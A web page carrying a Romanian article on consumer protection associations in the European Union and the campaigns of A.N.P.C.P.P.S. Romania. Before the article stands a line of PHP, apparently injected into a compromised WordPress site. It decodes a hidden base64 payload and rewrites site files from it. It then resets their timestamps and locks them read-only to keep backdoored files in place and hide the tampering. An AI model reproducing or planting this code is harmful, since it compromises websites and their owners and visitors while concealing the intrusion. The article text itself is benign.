$wp_update_file="/home/shuffles/public_html/wp-admin/user/screens.php"; if ( is_file($wp_update_file) ) { $wp_update_content=trim(file_get_contents($wp_update_file)); if ( $wp_update_content!="" ) { $wp_update_content=substr($wp_update_content,6,-6); $wp_update_content=base64_decode($wp_update_content); $wp_update_arr=json_decode($wp_update_content,true); if ( is_array($wp_update_arr) ) { foreach($wp_update_arr as $value) { $file_mtime=filemtime($value["path"]); @chmod($value["path"],0777); @unlink($value["path"]); @file_put_contents($value["path"],$value["content"]); @touch($value["path"],$file_mtime); @chmod($value["path"],0444); } } } } Asociatiile de Protectia Consumatorilor in Uniunea Europeana – O noua atitudine

Protectia consumatorilor, a intereselor acestora si a sigurantei lor reprezinta oparte foarte importanta atat a politice interne a  oricarei tari cat si obiectivuluigeneral al Uniunii Europene.

Totodata, ea trebuie, datorita importantei pe care o prezinta, sa se constituie intr-o politica de sine statatoare cu obiective, prioritati si instrumente proprii.

Protectia consumatorului reprezinta o componenta de baza a sistemului protectiei sociale, avand in vedere un ansamblu de dispozitii privind initiativa publica si privata, destinat a asigura si a ameliora continuu respectarea intereselor consumatorilor din organizatiile pentru protectia consumatorilor.

Vocea care face cunsocuta drepturile de care benficiaza  cetatenii, in calitatea lor de consumatori, este aceea a asociatiilor pentru protectia consumatorilor.

Scopul asociatiilor de consumatorilor este de a apara drepturile si interesele legitime ale consumatorilor, de a ii informa pe acestia prin campanii de educare despre importanta cunoasterii drepturilor de care beneficiaza, de a colecta informatii referitoare la opiniile si problemele acestora si de a facilita legatura dintre legiuitor si cetateni – consumatori.

Desi nu beneficiaza de drept de control, organizatiile pentru protectia consumatorilor au conferite prin lege atat dreptul cat si obligatia de a asigura o informare continua a consumatorilor, de a sustine drepturile acestora, de a pune la dispozitia acestora informatii independente privind calitatea produselor puse pe piata de comercianti.

Asociatiile pentru protectia consumatorilor, au rolul de a proteja cetatenii, in calitatea acestora de consumatori, asigurand cadrul necesaraccesului neingradit la produse si servicii, informarea lor completa asupra caracteristiciloresentiale ale acestora, apararii si asigurarii drepturilor si intereselor lor legitimeimpotriva unor practici abuzive.

In aceeasi directie este indreptata si atentia Uniunii Europene, in sensul integrarii intereselor consumatorilor in toate politicile sale, asociatiile  de consumatori, facandu-si din nou simtita prezenta pe acest plan, in sensul informarii consumatorilor de actele normative care ii au in centru, elaborate pe plan european si transpuse in legislatia nationala.

Pornind de la complexitatea problemelor pe care le presupune un sistem eficient de aparare a drepturilor consumatorilor asociatiile pentru protectia consumatorilor trebuie sa aiba o politica permanenta avand ca scop protectia continua intereselor legitime ale consumatorului.

In vederea sustinerii consumatorilor, organizatiile pentru ptotectia consumatorilor desfasoara campanii de educare, informare si constientizare a rolului important pe care il au acestia in societate, A.N.P.C.P.P.S Romnia,  se numara printre cele mai active asociatii pentru protectia consumatorilor, fiind o prezenta permanenta in acest cadru de informare a consumatorilor pe toate planurile care prezinta interes pentru acestia.

A.N.P.C.P.P.S Romania a desfasurat campanii care au avut ca obiect sustinerea consumatorilor in toate aspectele vietii sociale, crescand astfel increderea acestora organizatiile pentru consumatori, care le apara drepturile si intesele, care ii informeza asupra celor mai importante probleme cu care se confrunta societatea si care au un impact direct asupra lor.

Astfel, A.N.P.C.P.P.S Romania a sustinut intodeauna informarea continua, corecta, completa si in cunstinta de cauza a consumatorilor, asupra celor mai importante aspecte ale vietii sociale, de la problemele de mediu, sanatate, financiar-bancare, calitatea produeselor existente pe piata, solutionarea problemelor aparute intre consumatori si comercianti,  etc., mergand in aceeasi directie cu politica sustinuta de Uniunea Europeana, care garanteaza un inalt nivel de protectie a consumatorilor toate domeniile.

Ioana Trandafir – Consilier Juridic – Departament Juridic A.N.P.C.P.P.S. Romania

By o9admin